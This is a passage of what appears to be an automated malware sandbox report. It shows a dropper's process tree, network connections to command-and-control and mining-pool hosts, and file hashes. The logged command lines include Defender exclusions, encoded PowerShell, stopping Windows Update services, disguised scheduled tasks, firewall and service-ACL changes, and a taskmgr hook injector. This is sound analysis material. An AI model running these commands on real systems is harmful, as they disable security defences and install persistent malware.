| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2055.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1ECE.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\cmd.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\NEAS.f82c12a792c5887ad406c3355e66f0e9fbfb806d2f6c34c0fb563767ae8731a9.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.f82c12a792c5887ad406c3355e66f0e9fbfb806d2f6c34c0fb563767ae8731a9.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\It1tN66.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\It1tN66.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XT4Xf57.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XT4Xf57.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Bh35nV3.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Bh35nV3.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2xc9261.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2xc9261.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 540
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Xv2IQ3.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Xv2IQ3.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Sj7cv98.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Sj7cv98.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\is64.bat" "
C:\Users\Admin\AppData\Local\Temp\1ECE.exe
C:\Users\Admin\AppData\Local\Temp\1ECE.exe
C:\Users\Admin\AppData\Local\Temp\2055.exe
C:\Users\Admin\AppData\Local\Temp\2055.exe
C:\Users\Admin\AppData\Local\Temp\3C5A.exe
C:\Users\Admin\AppData\Local\Temp\3C5A.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\4FE4.exe
C:\Users\Admin\AppData\Local\Temp\4FE4.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\DB9B.exe
C:\Users\Admin\AppData\Local\Temp\DB9B.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\1B25.exe
C:\Users\Admin\AppData\Local\Temp\1B25.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Users\Admin\AppData\Local\Temp\5CA4.exe
C:\Users\Admin\AppData\Local\Temp\5CA4.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.178.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| US | 194.49.94.72:80 | tcp | |
| US | 8.8.8.8:53 | 190.92.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.252.72.23.in-addr.arpa | udp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| RU | 5.42.92.51:19057 | tcp | |
| NL | 194.169.175.118:80 | 194.169.175.118 | tcp |
| US | 8.8.8.8:53 | 118.175.169.194.in-addr.arpa | udp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| MD | 176.123.9.142:37637 | tcp | |
| US | 194.49.94.11:80 | tcp | |
| US | 8.8.8.8:53 | 142.9.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| IT | 185.196.9.161:80 | 185.196.9.161 | tcp |
| US | 8.8.8.8:53 | 161.9.196.185.in-addr.arpa | udp |
| RU | 185.174.136.219:443 | tcp | |
| US | 8.8.8.8:53 | 121.252.72.23.in-addr.arpa | udp |
| RU | 5.42.92.51:19057 | tcp | |
| US | 194.49.94.11:80 | tcp | |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| RU | 5.42.64.16:443 | 5.42.64.16 | tcp |
| US | 8.8.8.8:53 | 16.64.42.5.in-addr.arpa | udp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| RU | 5.42.92.51:19057 | tcp | |
| US | 194.49.94.11:80 | tcp | |
| US | 8.8.8.8:53 | bluepablo.fun | udp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | 92.180.67.172.in-addr.arpa | udp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| US | 95.214.26.28:80 | host-host-file8.com | tcp |
| US | 8.8.8.8:53 | 28.26.214.95.in-addr.arpa | udp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | bc827de4-7bcc-450d-9367-4a4d7839b866.uuid.theupdatetime.org | udp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| RU | 5.42.92.51:19057 | tcp | |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 194.49.94.11:80 | tcp | |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| BG | 91.92.247.247:39001 | tcp | |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | 247.247.92.91.in-addr.arpa | udp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 172.67.180.92:80 | bluepablo.fun | tcp |
| US | 8.8.8.8:53 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | server9.theupdatetime.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 142.251.125.127:19302 | stun2.l.google.com | udp |
| BG | 185.82.216.108:443 | server9.theupdatetime.org | tcp |
| US | 8.8.8.8:53 | 127.125.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| US | 188.114.96.0:443 | walkinglate.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
| RU | 195.10.205.16:1056 | tcp | |
| IT | 81.17.30.48:443 | tcp | |
| US | 8.8.8.8:53 | 48.30.17.81.in-addr.arpa | udp |
| BZ | 94.156.175.85:9001 | tcp | |
| US | 147.135.6.69:443 | tcp | |
| US | 8.8.8.8:53 | 85.175.156.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.6.135.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 51.15.193.130:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | server9.theupdatetime.org | udp |
| FR | 51.255.34.118:14433 | xmr-eu1.nanopool.org | tcp |
| BG | 185.82.216.108:443 | server9.theupdatetime.org | tcp |
| US | 8.8.8.8:53 | 130.193.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\It1tN66.exe
| MD5 | 491893e6c358aa250fdfa1a1ed74d22f |
| SHA1 | d70c11a4c0907ddd359900af513749c44c0f157a |
| SHA256 | 3d75d02b5b5181fbf6b04f50aa4fbbc03c7fc57e4d20408df550171c3b37c46e |
| SHA512 | fb0c01858180003ae41141b947d71f5d54952553ba35de7dabe9bec778749148868118a211a109fb7aa379fa4180466eaf2de0abffca8ab47c800a9df2863df7 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\It1tN66.exe
| MD5 | 491893e6c358aa250fdfa1a1ed74d22f |
| SHA1 | d70c11a4c0907ddd359900af513749c44c0f157a |
| SHA256 | 3d75d02b5b5181fbf6b04f50aa4fbbc03c7fc57e4d20408df550171c3b37c46e |
| SHA512 | fb0c01858180003ae41141b947d71f5d54952553ba35de7dabe9bec778749148868118a211a109fb7aa379fa4180466eaf2de0abffca8ab47c800a9df2863df7 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XT4Xf57.exe
| MD5 | 6894b59e42457f9adc0ad89cea66967e |
| SHA1 | 4306db854c5c54ae9e70c453474392948ce755fa |
| SHA256 | 98030c8e70962047193eaae57db6ff001ca50ddedfef1b23f70738cdcbfa792a |
| SHA512 | 4fa0ce1afbfa7a789fa4044db3766fc063245ac245bc263398b3ee4e3a064b5e56b5c05f3dfbd860f8c27a9a7588b64b7165df8e47209d5537ea5174b2679744 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XT4Xf57.exe
| MD5 | 6894b59e42457f9adc0ad89cea66967e |
| SHA1 | 4306db854c5c54ae9e70c453474392948ce755fa |
| SHA256 | 98030c8e70962047193eaae57db6ff001ca50ddedfef1b23f70738cdcbfa792a |
| SHA512 | 4fa0ce1afbfa7a789fa4044db3766fc063245ac245bc263398b3ee4e3a064b5e56b5c05f3dfbd860f8c27a9a7588b64b7165df8e47209d5537ea5174b2679744 |
